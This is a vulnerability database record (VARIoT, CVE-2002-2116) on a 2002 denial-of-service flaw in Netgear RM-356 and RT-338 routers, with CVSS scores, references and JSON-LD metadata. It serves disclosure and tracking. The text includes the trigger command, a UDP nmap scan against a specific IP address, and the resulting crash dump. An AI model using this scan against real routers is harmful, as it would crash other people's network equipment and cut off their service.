VAR-200212-0204
Vulnerability from variot - Updated: 2025-04-03 22:35
Netgear RM-356 and RT-338 series SOHO routers allow remote attackers to cause a denial of service (crash) via a UDP port scan, as demonstrated using nmap. RM-356 is a hardware router developed by Netgear, suitable for home or small office networks.
UDP scanning will crash RM-356 and RT-338. A cold boot is required to return to normal.
# nmap -sU 210.9.238.103 -T5
At this point a crash dump appears on the RM-356 console, with the following information:
Menu 24.2.1-System Maintenance-Information
Name: * _ netgear
Routing: IP
RAS F / W Version: V2.21 (I.03) | 3/30/2000
MODEM 1 F / W Version: V2.210-V90_2M_DLS
Country Code: 244
LAN
Ethernet Address: 00: a0: c5: e3: **: **
IP Address: 192.168.0.1
IP Mask: 255.255.255.0
DHCP: Server
CRASHDUMP ::
Boot Module Version: 4.40. Built at Wed Feb 23 14:00:29 2000
A TCP connect() scan, however, completes normally.
It is worth noting that the above scan causes a crash even if SNMP (161/UDP) is not open. The problem is possibly in the filtering code. Most SOHO Netgear devices have a simple filtering mechanism. It is maintained and distributed by Netgear.
Under some circumstances, a port scan of the router could cause a denial of service. It has been reported that port scanning an RM-356 with UDP causes the router to become unstable. This is usually accompanied by a crash, requiring a power cycle of the router to resume normal operation. It is also reported that this problem seems to affect port 161/UDP (SNMP) specifically. This problem has been reported to also affect the RT-338 models, and may affect others.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200212-0204",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rm356",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": "rt338",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "rm356",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "rt338",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "rt-338",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "rm-356",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ben Ryan\u203b ben@bssc.edu.au",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 0.6
},
"cve": "CVE-2002-2116",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2002-2116",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-6499",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2002-2116",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200212-809",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-6499",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear RM-356 and RT-338 series SOHO routers allow remote attackers to cause a denial of service (crash) via a UDP port scan, as demonstrated using nmap. RM-356 is a hardware router developed by Netgear, suitable for home or small office networks. \n\n\u00a0UDP scanning will crash RM-356 and RT-338. A cold boot is required to return to normal. \n\n\u00a0# nmap -sU 210.9.238.103 -T5\n\n\u00a0At this time, a crashdump occurred on the RM-356 console, and the information is as follows\n\n\u00a0Menu 24.2.1-System Maintenance-Information\n\n\u00a0Name: ******* _ netgear\n\n\u00a0Routing: IP\n\n\u00a0RAS F / W Version: V2.21 (I.03) | 3/30/2000\n\n\u00a0MODEM 1 F / W Version: V2.210-V90_2M_DLS\n\n\u00a0Country Code: 244\n\n\u00a0LAN\n\n\u00a0Ethernet Address: 00: a0: c5: e3: **: **\n\n\u00a0IP Address: 192.168.0.1\n\n\u00a0IP Mask: 255.255.255.0\n\n\u00a0DHCP: Server\n\n\u00a0CRASHDUMP ::\n\n\u00a054f7a0: 00 54 f7 a8 00 21 e9 38 00 54 f8 10 00 21 e9 38 .T ...!. 8.T ...!. 8\n\n\u00a054f7b0: 00 00 00 07 00 41 37 bc 00 2b 09 ca 00 00 00 00 ..... A7 .. + ...... \n\n\u00a054f7c0: 00 55 24 4c 00 2b 09 b2 00 00 00 00 00 55 24 4c .U $ L. + ....... U $ L\n\n\u00a054f7d0: 00 00 00 05 00 00 00 00 00 21 16 24 00 57 26 04 .........!. $. W \u0026. \n\n\u00a054f7e0: 00 58 5e e8 00 21 16 24 00 00 26 04 00 21 16 24 .X ^ ..!. $ .. \u0026 ..!. $\n\n\u00a054f7f0: 00 41 20 00 00 54 f8 10 00 21 ea 34 00 41 20 00 .A ..T ...!. 4.A. \n\n\u00a054f800: 00 00 00 07 ff ff ff ff 00 54 f8 10 00 21 e6 6e ......... T ...!. N\n\n\u00a054f810: 00 54 f8 2c 00 21 e6 6e 00 41 37 bc ff ff ff ff .T.,.!. N.A7 ..... \n\n\u00a054f820: ff ff 20 04 00 5e 2e 60 00 40 f7 20 00 54 f8 68 .. ^. `. @. .T.h\n\n\u00a054f830: 00 21 b0 00 00 00 00 01 00 2b 09 ca ff ff ff ff.! ....... + ...... \n\n\u00a054f840: 00 00 00 07 00 2b 09 b2 00 5e 2e 60 00 00 00 00 ..... + ... ^. `... \n\n\u00a054f850: ff ff ff ff 00 00 00 00 00 00 00 00 00 54 f9 9c ............. T .. 
\n\n\u00a054f860: 00 5e 2e 60 00 00 00 00 00 54 f8 a8 00 21 a8 1a. ^. `..... T ...! .. \n\n\u00a054f870: 00 00 00 07 ff ff ff ff 00 5e 2e 60 00 00 00 00 ......... ^. `... \n\n\u00a054f880: 00 00 00 08 00 00 00 00 00 00 00 21 00 00 00 24 ...........! ... $\n\n\u00a054f890: 00 00 00 00 00 54 f9 9c 00 5f ec d0 00 55 24 4c ..... T ..._... U $ L\n\n\u00a054f8a0: 00 55 24 4c 00 5e 2e 60 00 54 f8 fc 00 23 b8 42 .U $ L. ^. `.T ... #. B\n\n\u00a0Boot Module Version: 4.40. Built at Wed Feb 23 14:00:29 2000\n\n\u00a0But TCP connect () scans normally. \n\n\u00a0It is worth noting that even if SNMP 161 / UDP is not open, the above scan will also cause a crash. Problem possible\n\n\u00a0In the filtering code. Most SOHO Netgear devices have a simple filtering mechanism. It is maintained and distributed by Netgear. \nUnder some circumstances, a portscan of the router could cause a denial of service. It has been reported that portscanning a RM-356 with UDP causes the router to become unstable. This is usually accompanied by a crash, requiring a power cycling of the router to resume normal operation. It is also reported that this problem seems to affect port 161/UDP (SNMP) specifically. This problem has been reported to also affect the RT-338 models, and may affect others",
"sources": [
{
"db": "NVD",
"id": "CVE-2002-2116"
},
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "VULHUB",
"id": "VHN-6499"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2002-2116",
"trust": 2.3
},
{
"db": "BID",
"id": "4111",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2002-0268",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "2332",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20020215 RE: REMOTE DOS IN NETGEAR RM-356",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20020215 REMOTE DOS IN NETGEAR RM-356",
"trust": 0.6
},
{
"db": "XF",
"id": "8206",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-6499",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"id": "VAR-200212-0204",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-6499"
}
],
"trust": 0.6147059
},
"last_update_date": "2025-04-03T22:35:06.869000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/4111"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-02/0183.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-02/0162.html"
},
{
"trust": 1.7,
"url": "http://www.iss.net/security_center/static/8206.php"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/2332"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/product_view.asp?xrp=4\u0026yrp=10\u0026zrp=33"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-02-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"date": "2002-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-6499"
},
{
"date": "2002-02-15T00:00:00",
"db": "BID",
"id": "4111"
},
{
"date": "2002-02-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"date": "2002-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-02-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-6499"
},
{
"date": "2002-02-15T00:00:00",
"db": "BID",
"id": "4111"
},
{
"date": "2006-01-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear SOHO Router UDP Port Scan Denial of Service Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 0.9
}
}